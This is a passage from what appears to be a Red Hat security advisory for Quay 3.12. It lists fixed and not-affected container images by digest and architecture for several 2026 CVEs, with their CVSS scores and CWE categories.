Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix Workaround

Known not affected 24 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64	—	Workaround

Threats

Impact Moderate

CVE-2026-32589

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

CWE-639 - Authorization Bypass Through User-Controlled Key

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix

Known not affected 24 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64		—

Threats

Impact Important

CVE-2026-32590

7.1 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CWE-502 - Deserialization of Untrusted Data

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix

Known not affected 24 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64		—

Threats

Impact Moderate

CVE-2026-33894

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE-347 - Improper Verification of Cryptographic Signature

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix Workaround

Known not affected 24 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64	—	Workaround

Threats

Impact Important

CVE-2026-34986

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-131 - Incorrect Calculation of Buffer Size

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix Workaround

Known not affected 24 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x	—	Workaround
